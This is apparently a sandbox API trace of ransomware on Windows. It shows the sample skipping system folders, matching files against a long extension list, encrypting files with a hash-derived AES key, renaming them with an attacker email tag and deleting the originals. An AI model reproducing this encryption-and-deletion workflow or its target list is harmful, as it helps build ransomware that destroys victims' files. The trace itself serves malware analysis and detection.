	[0173.434] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.436] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\*.*", lpSrch="winnt") returned 0x0
	[0173.436] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.436] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\*.*", lpSrch="tmp") returned 0x0
	[0173.436] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.436] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\*.*", lpSrch="cache") returned 0x0
	[0173.437] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.437] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\*.*", lpSrch="temporary internet files") returned 0x0
	[0173.437] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.437] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\*.*", lpSrch="webcache") returned 0x0
	[0173.437] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.437] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\*.*", lpSrch="inetcache") returned 0x0
	[0173.437] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.438] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\*.*", lpSrch="nvidia") returned 0x0
	[0173.438] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.438] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\*.*", lpSrch="packages") returned 0x0
	[0173.438] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.438] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\*.*", lpSrch="cookies") returned 0x0
	[0173.438] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.438] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\*.*", lpSrch="programdata") returned 0x0
	[0173.438] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdc44d0, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcdc44d0, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcdea603, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0173.439] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0ce2cc2, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa0ce2cc2, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa0ce2cc2, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x8b2, dwReserved0=0x0, dwReserved1=0x0, cFileName="customizations.xml", cAlternateFileName="CUSTOM~1.XML")) returned 1
	[0173.439] lstrcmpW (lpString1="customizations.xml", lpString2="..") returned 1
	[0173.439] lstrcmpW (lpString1="customizations.xml", lpString2=".") returned 1
	[0173.439] lstrcpyW (in: lpString1=0x18b0e4, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\"
	[0173.439] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\", lpString2="customizations.xml" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\customizations.xml") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\customizations.xml"
	[0173.439] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\customizations.xml") returned 99
	[0173.439] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0173.439] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\customizations.xml", cchLength=0x63 | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\customizations.xml") returned 0x63
	[0173.439] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.440] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\customizations.xml", lpSrch="help_decrypt_your_files") returned 0x0
	[0173.440] lstrcpyW (in: lpString1=0x18ac8c, lpString2="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\customizations.xml" | out: lpString1="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\customizations.xml") returned="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\customizations.xml"
	[0173.440] lstrlenW (lpString="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\customizations.xml") returned 99
	[0173.440] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0173.440] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.440] StrStrW (lpFirst=".xml", lpSrch=".") returned=".xml"
	[0173.441] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.441] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".xml") returned=".xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0173.441] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0173.441] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0173.441] CreateFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\customizations.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\customizations.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0173.442] ReadFile (in: hFile=0x390, lpBuffer=0xfdc138, nNumberOfBytesToRead=0x8b2, lpNumberOfBytesRead=0x18a640, lpOverlapped=0x0 | out: lpBuffer=0xfdc138*, lpNumberOfBytesRead=0x18a640*=0x8b2, lpOverlapped=0x0) returned 1
	[0173.446] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0173.447] CryptAcquireContextW (in: phProv=0x18a1f0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a1f0*=0xfcae68) returned 1
	[0173.449] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0173.449] CryptCreateHash (in: hProv=0xfcae68, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18a1f4 | out: phHash=0x18a1f4) returned 1
	[0173.449] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0173.449] CryptHashData (hHash=0xfb9b30, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0173.449] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0173.450] CryptDeriveKey (in: hProv=0xfcae68, Algid=0x6610, hBaseData=0xfb9b30, dwFlags=0x1, phKey=0x18a1f8 | out: phKey=0x18a1f8*=0xfb90f0) returned 1
	[0173.450] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0173.450] CryptEncrypt (in: hKey=0xfb90f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18a20c*=0x8b2, dwBufLen=0x8b2 | out: pbData=0x0*, pdwDataLen=0x18a20c*=0x8c0) returned 1
	[0173.451] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0173.451] RtlMoveMemory (in: Destination=0xfde528, Source=0xfdc138, Length=0x8b2 | out: Destination=0xfde528) 
	[0173.451] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0173.451] CryptEncrypt (in: hKey=0xfb90f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfde528*, pdwDataLen=0x18a1ec*=0x8b2, dwBufLen=0x8c0 | out: pbData=0xfde528*, pdwDataLen=0x18a1ec*=0x8c0) returned 1
	[0173.452] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0173.452] CryptDestroyKey (hKey=0xfb90f0) returned 1
	[0173.452] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0173.452] CryptDestroyHash (hHash=0xfb9b30) returned 1
	[0173.452] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0173.452] CryptReleaseContext (hProv=0xfcae68, dwFlags=0x0) returned 1
	[0173.453] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0173.453] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a208, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a208*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0173.453] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0173.453] GetUserNameA (in: lpBuffer=0x18a0ec, pcbBuffer=0x18a204 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a204) returned 1
	[0173.455] wsprintfW (in: param_1=0x18a220, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\customizations.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 141
	[0173.455] CreateFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\customizations.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\customizations.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x39c
	[0173.455] WriteFile (in: hFile=0x39c, lpBuffer=0xfde528*, nNumberOfBytesToWrite=0x8c0, lpNumberOfBytesWritten=0x18a648, lpOverlapped=0x0 | out: lpBuffer=0xfde528*, lpNumberOfBytesWritten=0x18a648*=0x8c0, lpOverlapped=0x0) returned 1
	[0173.458] CloseHandle (hObject=0x39c) returned 1
	[0173.459] CloseHandle (hObject=0x390) returned 1
	[0173.460] DeleteFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\customizations.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\customizations.xml")) returned 1
	[0173.463] DeleteFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\customizations.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\customizations.xml")) returned 0
	[0173.463] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0c7056c, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa0c7056c, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa0c7056c, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x10f, dwReserved0=0x0, dwReserved1=0x0, cFileName="MasterDatastore.xml", cAlternateFileName="MASTER~1.XML")) returned 1
	[0173.463] lstrcmpW (lpString1="MasterDatastore.xml", lpString2="..") returned 1
	[0173.463] lstrcmpW (lpString1="MasterDatastore.xml", lpString2=".") returned 1
	[0173.464] lstrcpyW (in: lpString1=0x18b0e4, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\"
	[0173.464] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\", lpString2="MasterDatastore.xml" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\MasterDatastore.xml") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\MasterDatastore.xml"
	[0173.464] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\MasterDatastore.xml") returned 100
	[0173.464] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0173.464] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\MasterDatastore.xml", cchLength=0x64 | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\masterdatastore.xml") returned 0x64
	[0173.464] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.464] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\masterdatastore.xml", lpSrch="help_decrypt_your_files") returned 0x0
	[0173.464] lstrcpyW (in: lpString1=0x18ac8c, lpString2="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\masterdatastore.xml" | out: lpString1="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\masterdatastore.xml") returned="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\masterdatastore.xml"
	[0173.465] lstrlenW (lpString="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\masterdatastore.xml") returned 100
	[0173.465] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0173.465] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.465] StrStrW (lpFirst=".xml", lpSrch=".") returned=".xml"
	[0173.465] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.465] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.o